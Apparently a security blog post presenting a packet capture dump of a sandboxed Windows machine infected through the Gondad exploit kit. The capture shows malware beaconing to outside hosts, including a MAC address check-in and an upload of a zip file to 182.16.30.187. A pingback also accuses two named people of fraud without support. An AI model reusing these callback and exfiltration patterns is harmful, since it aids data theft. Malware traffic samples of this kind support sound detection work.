Gondad EK Exploit Kit using QQ.com Malware Infection PCAP Traffic Sample

By | June 22, 2015

2014-12-13 21:12:18.365748 IP 192.168.56.101.1389 > 8.8.8.8.53: 37206+ A? r.qzone.qq.com. (32)
E..<……(…8e…..m.5.(*..V………..r.qzone.qq.com…..
2014-12-13 21:12:18.426615 IP 8.8.8.8.53 > 192.168.56.101.1389: 37206 4/0/0 CNAME qq.com.edgesuite.net., CNAME a1574.b.akamai.net., A 23.61.194.48, A 23.61.194.216 (127)
E…….9..|……8e.5.m..^..V………..r.qzone.qq.com…………..W…qq.com edgesuite.net..,……J….a1574.b.akamai.=.N………..=.0.N………..=..
2014-12-13 21:12:18.431687 IP 192.168.56.101.1040 > 23.61.194.48.80: Flags [S], seq 759589942, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…….8e.=.0…P-Fl6….p……………
2014-12-13 21:12:18.435525 IP 23.61.194.48.80 > 192.168.56.101.1040: Flags [S.], seq 3705922240, ack 759589943, win 14600, options [mss 1260,nop,nop,sackOK], length 0
E..0..@.:.nM.=.0..8e.P……-Fl7p.9………….
2014-12-13 21:12:18.435848 IP 192.168.56.101.1040 > 23.61.194.48.80: Flags [.], ack 1, win 64240, length 0
E..(..@…….8e.=.0…P-Fl7….P………Soft
2014-12-13 21:12:18.438208 IP 192.168.56.101.1040 > 23.61.194.48.80: Flags [P.], seq 1:404, ack 1, win 64240, length 403
E…..@…….8e.=.0…P-Fl7….P…….GET /cgi-bin/user/cgi_personal_card?uin=3052346108?=6330 HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: r.qzone.qq.com
Connection: Keep-Alive
2014-12-13 21:12:18.441934 IP 23.61.194.48.80 > 192.168.56.101.1040: Flags [.], ack 404, win 15544, length 0
E..(..@.:.q\.=.0..8e.P……-Fm.P.<.A…
2014-12-13 21:12:18.669656 IP 23.61.194.48.80 > 192.168.56.101.1040: Flags [P.], seq 1:472, ack 404, win 15544, length 471
E…..@.:.o..=.0..8e.P……-Fm.P.<.t…HTTP/1.1 200 OK
Server: QZHTTP-2.38.18
Content-Encoding: gzip
Cache-Control: max-age=10800
Content-Type: application/x-javascript; charset=utf-8
ETag: “1357066188”
Content-Length: 194
Date: Sun, 14 Dec 2014 01:14:09 GMT
Connection: keep-alive
Vary: Accept-Encoding

……….M..
.0…}…$..Zk=
..x.m.64?M……….7…..*U.hg….!e..4[…EB…….4Aj….~….A…”.<..P^.I.|.j…5…./ks…M….|..AcL…..G
…..w…^.. .+.s.^-.}…sTX……….=.&../.P….
2014-12-13 21:12:18.696983 IP 192.168.56.101.137 > 192.168.56.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N …..>…8e..8……:………….. FHEPFCELEHFCEPFFFACACACACACACABL.. ..
2014-12-13 21:12:18.696989 IP 192.168.56.101.137 > 192.168.56.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N …..>…8e..8……:………….. FHEPFCELEHFCEPFFFACACACACACACABL.. ..
2014-12-13 21:12:18.746548 IP 192.168.56.101.1041 > 23.248.253.254.80: Flags [S], seq 4204432804, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0 z@….I..8e…….P……..p……………
2014-12-13 21:12:18.758293 IP 23.248.253.254.80 > 192.168.56.101.1041: Flags [S.], seq 2147096055, ack 4204432805, win 16384, options [mss 1260,nop,nop,sackOK], length 0
E..0*…x. )……8e.P……….p.@..@……….
2014-12-13 21:12:18.758652 IP 192.168.56.101.1041 > 23.248.253.254.80: Flags [.], ack 1, win 64240, length 0
E..( {@….P..8e…….P……..P….K..8C-2DA
2014-12-13 21:12:18.759177 IP 192.168.56.101.1041 > 23.248.253.254.80: Flags [P.], seq 1:280, ack 1, win 64240, length 279
E..? |@….8..8e…….P……..P….C..Get /Count.asp?ver=001&mac=08-00-27-8F-E3-EB HTTP/1.1
Accept-Language: zh-CN
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: 23.248.253.254
Content-Length: 0
Connection: Keep-Alive
2014-12-13 21:12:18.787196 IP 192.168.56.101.1040 > 23.61.194.48.80: Flags [.], ack 472, win 63769, length 0
E..( ~@…….8e.=.0…P-Fm…..P….R..^….I
2014-12-13 21:12:18.818887 IP 23.248.253.254.80 > 192.168.56.101.1041: Flags [P.], seq 1:271, ack 280, win 65256, length 270
E..6*.@.x………8e.P……….P….I..HTTP/1.1 200 OK
Server: NetBox Version 2.8 Build 4128
Date: Sun, 14 Dec 2014 01:14:11 GMT
Connection: Keep-Alive
Set-Cookie: JKQABTJMCKRYPPRMIHAA=FUMSTIKJLEGHCRKECKKYMVVHWRLTQRTKNKIDAPRK; path=/
Cache-control: private
Content-Type: text/html
Content-Length: 0
2014-12-13 21:12:18.838646 IP 192.168.56.101.1042 > 182.16.30.187.80: Flags [S], seq 3561090013, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0 .@…#G..8e…….P.A……p……………
2014-12-13 21:12:18.987347 IP 192.168.56.101.1041 > 23.248.253.254.80: Flags [.], ack 271, win 63970, length 0
E..( .@…….8e…….P……..P….4..N….I
2014-12-13 21:12:18.998616 IP 182.16.30.187.80 > 192.168.56.101.1042: Flags [S.], seq 3226440986, ack 3561090014, win 16384, options [mss 1260,nop,nop,sackOK], length 0
E..0cA..v………8e.P…O…A..p.@.\………..
2014-12-13 21:12:18.998976 IP 192.168.56.101.1042 > 182.16.30.187.80: Flags [.], ack 1, win 64240, length 0
E..( .@…#I..8e…….P.A…O..P………..0.
2014-12-13 21:12:18.999985 IP 192.168.56.101.1042 > 182.16.30.187.80: Flags [P.], seq 1:364, ack 1, win 64240, length 363
E… .@…!…8e…….P.A…O..P…….GET /ip.php?=8256 HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 182.16.30.187
Connection: Keep-Alive
2014-12-13 21:12:19.160735 IP 182.16.30.187.80 > 192.168.56.101.1042: Flags [P.], seq 1:277, ack 364, win 65172, length 276
E..<c.@.v..a……8e.P…O…A.IP….f..HTTP/1.1 200 OK
Date: Sun, 14 Dec 2014 01:14:21 GMT
Server: Apache/2.2.4 (Win32) PHP/5.2.3
X-Powered-By: PHP/5.2.3
Content-Length: 32
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: ko

5d8bf0771ea8586271af714a6119c022
2014-12-13 21:12:19.287408 IP 192.168.56.101.1042 > 182.16.30.187.80: Flags [.], ack 277, win 63964, length 0
E..(
.@…”P..8e…….P.A.I.O./P…………I
2014-12-13 21:12:19.859217 IP 192.168.56.101.138 > 192.168.56.255.138: NBT UDP PACKET(138)
E………<N..8e..8……………8e…… EIEPENEFCACACACACACACACACACACAAA. ABACFPFPENFDECFCEPFHFDEFFPFPACAB..SMB%…………………………%……………….%.V………6.\MAILSLOT\BROWSE…….WORKGROUP.(.6..`.
…..`..HOME.
2014-12-13 21:12:19.859232 IP 192.168.56.101.138 > 192.168.56.255.138: NBT UDP PACKET(138)
E………<N..8e..8……………8e…… EIEPENEFCACACACACACACACACACACAAA. ABACFPFPENFDECFCEPFHFDEFFPFPACAB..SMB%…………………………%……………….%.V………6.\MAILSLOT\BROWSE…….WORKGROUP.(.6..`.
…..`..HOME.
2014-12-13 21:12:21.347539 IP 192.168.56.101.1042 > 182.16.30.187.80: Flags [P.], seq 364:1140, ack 277, win 63964, length 776
E..0.5@…….8e…….P.A.I.O./P…&…POST /upload.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://182.16.30.187/upload.php
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=—————————7da3e1bd0314
Content-Length: 291
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 182.16.30.187
Cache-Control: no-cache

—————————–7da3e1bd0314
Content-Disposition: form-data; name=”upload_file1″; filename=”C:\DOCUME~1\User\LOCALS~1\Temp\eafbb777ecea145c0caadf054ab3dc51.zip”
Content-Type: application/x-zip-compressed

PK………………..
—————————–7da3e1bd0314–

2014-12-13 21:12:21.508854 IP 182.16.30.187.80 > 192.168.56.101.1042: Flags [P.], seq 277:478, ack 1140, win 64396, length 201
E…g.@.v………8e.P…O./.A.QP…B…HTTP/1.1 200 OK
Date: Sun, 14 Dec 2014 01:14:24 GMT
Server: Apache/2.2.4 (Win32) PHP/5.2.3
X-Powered-By: PHP/5.2.3
Content-Length: 0
Content-Type: text/html;charset=utf-8
Content-Language: ko

Share Button

One thought on “Gondad EK Exploit Kit using QQ.com Malware Infection PCAP Traffic Sample

  1. Pingback: Margaret Cunniffe and David Brown are Australian Fraudsters based in Melbourne Victoria claim to raise money for charities via Synergize Vip Vip Club and Connect Network Fundraise but are nothing more than con-artists.

Leave a Reply

Your email address will not be published. Required fields are marked *